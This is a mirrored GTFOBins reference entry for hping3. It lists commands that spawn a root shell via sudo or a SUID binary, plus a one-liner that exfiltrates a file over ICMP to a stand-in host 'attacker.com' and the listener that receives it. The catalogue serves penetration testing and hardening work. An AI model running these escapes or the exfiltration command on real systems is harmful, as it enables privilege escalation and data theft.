1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/hping3.md
Andrea Cardaci f6f4797356 Fix hping3
2022-12-16 15:56:43 +01:00

558 B

functions
shell suid sudo
code
hping3 /bin/sh
code
./hping3 /bin/sh -p
code
sudo hping3 /bin/sh
description code
The file is continuously sent, adjust the `--count` parameter or kill the sender when done. Receive on the attacker box with: ``` sudo hping3 --icmp --listen xxx --dump ``` RHOST=attacker.com LFILE=file_to_read sudo hping3 "$RHOST" --icmp --data 500 --sign xxx --file "$LFILE"